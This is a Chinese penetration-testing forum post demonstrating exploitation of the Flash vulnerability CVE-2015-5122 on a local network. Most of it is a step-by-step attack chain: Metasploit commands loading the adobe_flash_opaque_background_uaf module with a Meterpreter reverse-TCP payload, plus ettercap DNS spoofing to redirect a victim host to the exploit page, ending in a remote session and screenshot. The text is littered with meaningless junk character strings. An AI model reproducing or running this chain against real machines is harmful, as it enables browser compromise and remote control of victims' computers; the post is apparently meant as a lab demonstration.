中国网络渗透测试联盟

标题: cve2015-5122漏洞实例演示虚拟机 [打印本页]

作者: admin    时间: 2018-10-20 20:28
标题: cve2015-5122漏洞实例演示虚拟机

3 p5 h: N% @: ]; m# p' i 二、cve2015-5122漏洞实例演示虚拟机 # W* s% N' N2 }' u. W4 M1 R" {

7 N- J. \5 q& i! Y3 F( j

! ?# E+ z' U& V$ A: _; D2 G   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 4 e: w( p I W$ {

/ m$ u' N$ n; e5 \

2 ]! F% F3 b8 {3 E0 ?7 b search cve-2015-5122如图: . A0 ^* J7 d2 F+ t* z) I

2 p+ m1 }) n* \- @ ]3 y& R- m

' {4 _1 M& ^, i6 u   ' }: D$ R) G/ U4 F+ p" A4 b2 A8 Q$ {

& B9 B# b/ V1 o/ W& ~/ ~) l; R

# z& z* c. R4 F3 P/ N5 T7 h 下面我们敲如下命令: ! i+ H# S \" f& f, A7 y2 s

" b/ q$ p$ U* ]

* ]' e" `% @4 c, _7 ]( f" F use exploit/multi/browser/adobe_flash_opaque_background_uaf ) X# I" s2 r: d( r8 z2 j

( C0 K/ Y. z; S; t

! E( \' G( s$ T, `. ] set PAYLOAD windows/meterpreter/reverse_tcp ! J9 W8 `2 w) W( l

2 r5 A% e8 a' ?5 W( Y

( c$ p9 g3 M, [( v& d/ J set LHOST 192.168.0.109 6 x5 [6 H0 ?$ l

$ L6 g1 O* r" |( `

* [+ ?) d# e' ?* ]0 c, c set URIPATH /                        /*根目录*/ & n3 w" ?! D% g. r& p$ J" F

K: Q: F1 c: a

# |/ R6 ~& U1 n6 y/ F set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 7 V* _ g$ m" j3 ~9 C1 Y

$ Y- o8 q: x* _

' r8 g* s4 j- ] k+ x8 S1 r9 X3 Q set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 / f7 U) D+ |) {8 P4 [+ Y

+ x- T7 _5 ]: \1 a6 e* z

2 x3 l2 F' p0 Y 然后show options如图: $ Y1 x5 P, u; K' j

' @9 G) |" S- j* o/ t8 a o& m, i

/ ^8 H1 U2 R- A( o   5 K6 Y4 m5 a ]6 E

. K' S, C, Z+ Q# V1 p

! ^5 B$ S" p. I: j 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
+ I! ]1 F0 a* ?
9 ^8 ] q8 l+ K: j3 F/ _+ g+ H$ n

5 @0 _ o& f g3 v7 O0 X5 B

8 d9 }8 g0 I0 `0 o7 X% u+ @ 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 + q( Q! k/ @$ r7 m) X% X6 n

4 D4 S, W' R3 z

* \& k( [* m" g; e; R' k# r Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf * @' q$ B. ], @

- |0 k% ]7 p. I' w s6 U+ r. F

# N9 t1 n% o! X5 o8 O, v   , F! K6 _; w( K

% k/ o9 l4 y4 a; ]7 s9 R& B4 h0 M

) u3 E, w! N2 @, ?! ^ 成功了,这时候我们断开ettercap,如图: ( I7 g( A6 ~/ {( I/ R

: n# g! M. b3 D9 B7 h

- p7 D7 ` v* \5 w2 h   , [0 ?9 T5 L7 C

; V- P+ h6 F! x

# F7 w& }: y& g) p. W Screenshot如图: 6 a+ h3 J' ]3 V D7 s

' W) O# _7 B2 e1 J# c- f# x

1 e0 M$ g$ Z& q1 I" A   % N9 h% y2 z& T' D& L+ | I

# y. f3 U/ r, g9 O1 y

$ J% K [# r1 A; p 4 R! ]+ b, F% h2 T! F* |* Z# _+ y+ k






欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2